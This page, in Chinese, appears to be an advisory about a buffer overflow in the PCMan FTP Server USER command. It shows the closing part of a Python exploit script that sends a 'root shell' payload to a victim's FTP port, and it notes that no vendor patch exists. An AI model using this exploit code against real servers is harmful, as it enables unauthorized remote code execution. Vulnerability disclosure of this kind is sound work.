PCMan FTP Server 'USER'命令缓冲区溢出漏洞(2)

try:
        print """ [*] Attempting to exploit the FTP USER command.
 [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d.
 [*] Payload Length: %d bytes.""" % (victim, port, len(sploit))
        net_sock.send(sploit)
        sleep(1)
    except:
        print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll
exploit to %s [!!!]\n\n%s\n" % (victim, exc_info())
        sleep(1)
        exit(0)
 
    try:
        print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed
for code execution!
 [*] Closing network socket. Press ctrl + c repeatedly to force exploit
cleanup.\n"""
        net_sock.close()
    except:
        print "\n [!!!] There was an error closing the network socket.
[!!!]\n\n%s\n" % exc_info()
        sleep(1)
        exit(0)
 

if __name__ == "__main__":
    main()

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
PCMan
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
https://files.secureserver.net/1sMltFOsytirTG

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxfjp.html